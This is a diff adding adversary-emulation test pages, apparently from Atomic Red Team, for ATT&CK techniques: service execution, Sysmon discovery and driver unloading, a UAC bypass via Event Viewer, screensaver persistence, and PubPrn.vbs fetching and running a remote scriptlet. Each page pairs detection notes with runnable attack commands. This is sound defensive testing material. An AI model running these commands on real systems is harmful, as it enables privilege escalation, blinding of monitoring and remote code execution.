diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md
new file mode 100644
index 00000000..f7a41bec
--- /dev/null
+++ b/atomics/T1035/T1035.md
@@ -0,0 +1,40 @@
+# T1035 - Service Execution
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
+Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
+
+Detection: Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec.
+
+Platforms: Windows
+
+Data Sources: Windows Registry, Process command-line parameters, Process monitoring
+
+Permissions Required: Administrator, SYSTEM
+
+Remote Support: Yes
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a Command as a Service](#atomic-test-1---execute-a-command-as-a-service)
+
+
+
+
+## Atomic Test #1 - Execute a Command as a Service
+Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_name | Name of service to create | string | ARTService|
+| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:�rt-marker.txt|
+
+#### Run it with `command_prompt`!
+```
+sc.exe create #{service_name} binPath= #{executable_command}
+sc.exe start #{service_name}
+sc.exe delete #{service_name}
+```
+
diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md
index 06b131f5..a0a1a390 100644
--- a/atomics/T1063/T1063.md
+++ b/atomics/T1063/T1063.md
@@ -28,6 +28,8 @@ Permissions Required: User, Administrator, SYSTEM
- [Atomic Test #3 - Security Software Discovery - ps](#atomic-test-3---security-software-discovery---ps)
+- [Atomic Test #4 - Security Software Discovery - Sysmon Service](#atomic-test-4---security-software-discovery---sysmon-service)
+
@@ -77,3 +79,16 @@ ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
+
+
+## Atomic Test #4 - Security Software Discovery - Sysmon Service
+Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+fltmc.exe | findstr.exe 385201
+```
+
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
new file mode 100644
index 00000000..8c550233
--- /dev/null
+++ b/atomics/T1088/T1088.md
@@ -0,0 +1,57 @@
+# T1088 - Bypass User Account Control
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1088)
+Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
+
+If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
+
+Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
+
+* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)
+
+Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)
+
+Detection: There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of Process Injection and unusual loaded DLLs through DLL Search Order Hijacking, which indicate attempts to gain access to higher privileged processes.
+
+Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
+
+* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key. (Citation: enigma0x3 Fileless UAC Bypass)
+* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys. (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)
+
+Analysts should monitor these Registry settings for unauthorized changes.
+
+Platforms: Windows
+
+Data Sources: System calls, Process monitoring, Authentication logs, Process command-line parameters
+
+Effective Permissions: Administrator
+
+Defense Bypassed: Windows User Account Control
+
+Permissions Required: User, Administrator
+
+Contributors: Stefan Kanthak, Casey Smith
+
+## Atomic Tests
+
+- [Atomic Test #1 - Bypass UAC using Event Viewer](#atomic-test-1---bypass-uac-using-event-viewer)
+
+
+
+
+## Atomic Test #1 - Bypass UAC using Event Viewer
+Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
+
+#### Run it with `command_prompt`!
+```
+reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
+cmd.exe -c eventvwr.msc
+```
+
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 413f99d5..7876b2bc 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -26,6 +26,8 @@ Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems
- [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella)
+- [Atomic Test #8 - Unload Sysmon Filter Driver](#atomic-test-8---unload-sysmon-filter-driver)
+
@@ -141,3 +143,21 @@ Disables OpenDNS Umbrella
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
+
+
+## Atomic Test #8 - Unload Sysmon Filter Driver
+Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
+
+#### Run it with `command_prompt`!
+```
+fltmc.exe unload #{sysmon_driver}
+```
+
diff --git a/atomics/T1180/T1180.md b/atomics/T1180/T1180.md
new file mode 100644
index 00000000..9dc25321
--- /dev/null
+++ b/atomics/T1180/T1180.md
@@ -0,0 +1,51 @@
+# T1180 - Screensaver
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1180)
+Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. (Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.exe is located in C:\Windows\System32\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
+
+*SCRNSAVE.exe - set to malicious PE path
+*ScreenSaveActive - set to '1' to enable the screensaver
+*ScreenSaverIsSecure - set to '0' to not require a password to unlock
+*ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed
+
+Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)
+
+Detection: Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
+
+Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
+
+Platforms: Windows
+
+Data Sources: Process Monitoring, Process command-line parameters, Windows Registry, File monitoring
+
+Permissions Required: User
+
+Contributors: Bartosz Jerzman
+
+## Atomic Tests
+
+- [Atomic Test #1 - Set Arbitrary Binary as Screensaver](#atomic-test-1---set-arbitrary-binary-as-screensaver)
+
+
+
+
+## Atomic Test #1 - Set Arbitrary Binary as Screensaver
+This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe|
+
+#### Run it with `command_prompt`!
+```
+copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
+shutdown /r /t 0
+```
+
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
new file mode 100644
index 00000000..34bcaaea
--- /dev/null
+++ b/atomics/T1216/T1216.md
@@ -0,0 +1,45 @@
+# T1216 - Signed Script Proxy Execution
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
+Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
+
+PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
+
+There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)
+
+Detection: Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
+
+Platforms: Windows
+
+Data Sources: Process monitoring, Process command-line parameters
+
+Defense Bypassed: Application whitelisting, Digital Certificate Validation
+
+Permissions Required: User
+
+Remote Support: No
+
+Contributors: Praetorian
+
+## Atomic Tests
+
+- [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)
+
+
+
+
+## Atomic Test #1 - PubPrn.vbs Signed Script Bypass
+Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct|
+
+#### Run it with `command_prompt`!
+```
+cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
+```
+
diff --git a/atomics/index.md b/atomics/index.md
index dbffddd5..5912a86e 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -102,7 +102,8 @@
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
-- T1180 Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1180 Screensaver](./T1180/T1180.md)
+ - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -128,7 +129,8 @@
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -159,6 +161,7 @@
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
+ - Atomic Test #8: Unload Sysmon Filter Driver [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
@@ -258,7 +261,8 @@
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1151 Space after Filename](./T1151/T1151.md)
- Atomic Test #1: Space After Filename [macos]
@@ -289,7 +293,8 @@
- Atomic Test #1: Install AppInit Shim [windows]
- [T1138 Application Shimming](./T1138/T1138.md)
- Atomic Test #1: Application Shim Installation [windows]
-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -383,6 +388,7 @@
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
+ - Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
- [T1082 System Information Discovery](./T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [linux, macos]
@@ -497,9 +503,11 @@
- Atomic Test #3: Scheduled task Remote [windows]
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
-- T1035 Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1035 Service Execution](./T1035/T1035.md)
+ - Atomic Test #1: Execute a Command as a Service [windows]
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- [T1153 Source](./T1153/T1153.md)
- Atomic Test #1: Execute Script using Source [macos, linux]
- Atomic Test #2: Execute Script using Source Alias [macos, linux]
diff --git a/atomics/matrix.md b/atomics/matrix.md
index 85592890..c738f0e5 100644
--- a/atomics/matrix.md
+++ b/atomics/matrix.md
@@ -4,9 +4,9 @@
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](./T1201/T1201.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Hooking](./T1179/T1179.md) | [Permission Groups Discovery](./T1069/T1069.md) | [Remote File Copy](./T1105/T1105.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -21,9 +21,9 @@
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](./T1107/T1107.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](./T1007/T1007.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Time Discovery](./T1124/T1124.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Gatekeeper Bypass](./T1144/T1144.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
-| | Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | [Scheduled Task](./T1053/T1053.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Service Execution](./T1035/T1035.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [Scheduled Task](./T1053/T1053.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
-| | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [Hidden Users](./T1147/T1147.md) | | | | | | |
+| | [Signed Script Proxy Execution](./T1216/T1216.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [Hidden Users](./T1147/T1147.md) | | | | | | |
| | [Source](./T1153/T1153.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](./T1165/T1165.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Space after Filename](./T1151/T1151.md) | [Launch Agent](./T1159/T1159.md) | [Sudo](./T1169/T1169.md) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [Sudo Caching](./T1206/T1206.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
@@ -45,7 +45,7 @@
| | | [Registry Run Keys / Start Folder](./T1060/T1060.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | [Process Injection](./T1055/T1055.md) | | | | | | |
-| | | Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Screensaver](./T1180/T1180.md) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rootkit](./T1014/T1014.md) | | | | | | |
@@ -53,7 +53,7 @@
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | [Trap](./T1154/T1154.md) | | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Timestomp](./T1099/T1099.md) | | | | | | |
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 0b340fb7..2953ffd3 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -6,7 +6,8 @@
- Atomic Test #1: Download & Execute [windows]
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- [T1009 Binary Padding](./T1009/T1009.md)
